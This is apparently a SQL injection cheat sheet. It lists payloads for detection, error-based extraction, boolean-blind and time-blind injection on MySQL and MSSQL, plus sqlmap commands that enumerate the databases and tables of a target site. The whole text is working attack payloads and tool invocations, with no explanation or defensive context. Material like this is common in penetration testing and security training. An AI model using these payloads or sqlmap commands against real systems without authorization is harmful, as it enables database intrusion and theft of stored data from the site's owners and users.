Detection
' -- single quote to break syntax
' OR '1'='1
1; SELECT SLEEP(5)-- -
Error-based
' AND extractvalue(1, concat(0x7e, (SELECT version())))-- -
Blind — Boolean
' AND (SELECT SUBSTRING(username,1,1) FROM users LIMIT 1)='a'-- -
Blind — Time
'; IF (1=1) WAITFOR DELAY '0:0:5'-- - -- MSSQL
' AND SLEEP(5)-- - -- MySQL
sqlmap
sqlmap -u "https://target.com/page?id=1" --dbs --batch
sqlmap -u "https://target.com/page?id=1" -D dbname --tables